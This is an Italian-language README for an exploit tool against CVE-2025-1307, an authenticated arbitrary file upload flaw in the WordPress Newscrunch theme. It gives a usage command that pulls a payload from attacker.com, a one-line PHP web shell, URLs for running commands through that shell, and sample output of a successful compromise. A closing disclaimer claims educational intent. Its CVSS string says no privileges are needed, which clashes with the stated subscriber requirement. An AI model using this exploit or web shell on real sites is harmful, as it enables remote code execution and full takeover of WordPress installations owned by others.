
Newscrunch <= 1.8.4 - Caricamento arbitrario di file autenticato (Abbonato+)
Questo exploit prende di mira una vulnerabilità critica (CVE-2025-1307) nel tema WordPress Newscrunch. La falla permette a utenti autenticati (di livello Abbonato e superiore) di caricare file arbitrari a causa della mancanza di controlli di capacità nella funzione newscrunch_install_and_activate_plugin(). Ciò può portare a Remote Code Execution (RCE), compromettendo completamente il sito WordPress interessato.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HSfruttabilità: Richiede un account WordPress valido con privilegi di Abbonato o superiori.
✅ Sfruttamento Automatico di CVE-2025-1307
✅ Rilevamento Automatico della Versione Vulnerabile del Tema
✅ Estrazione ed Esecuzione Automatica del Payload ZIP
✅ Recupero Dinamico del Nome del File Shell dallo ZIP
✅ Verifica Automatica della Disponibilità della Shell dopo lo Sfruttamento
✅ Logging Pulito e Strutturato per il Debug
Assicurati di avere Python 3.x installato e installa le dipendenze necessarie:
pip install requests urllib3 packaging
python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"
Exploit per CVE-2025-1307 nel Tema WordPress Newscrunch di Nxploit | Khaled Alenazi
options:
-h, --help mostra questo messaggio di aiuto ed esci
-u URL, --url URL URL del target WordPress (es. https://example.com)
-un USERNAME, --username USERNAME
Nome utente WordPress
-p PASSWORD, --password PASSWORD
Password WordPress
-pl PAYLOAD_URL, --payload_url PAYLOAD_URL
URL del file malevolo da caricare
Una volta che la shell è stata caricata con successo, permette l'esecuzione di comandi remoti sul sistema target. Il file shell deve essere inserito in un archivio ZIP e verrà estratto automaticamente durante lo sfruttamento.
Assicurati che la tua shell PHP (shell.php) sia all'interno di un archivio ZIP. Quindi, carica il file ZIP usando l'exploit.
<?php system($_GET['cmd']); ?>
Puoi eseguire comandi di sistema tramite il browser aggiungendo il parametro cmd all'URL della shell:
http://target/wp-content/plugins/shell.php?cmd=whoami
[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls
Questo strumento è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Lo sfruttamento non autorizzato delle vulnerabilità è illegale e punibile dalla legge. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Usalo in modo responsabile.
Di: Nxploit | Khaled Alenazi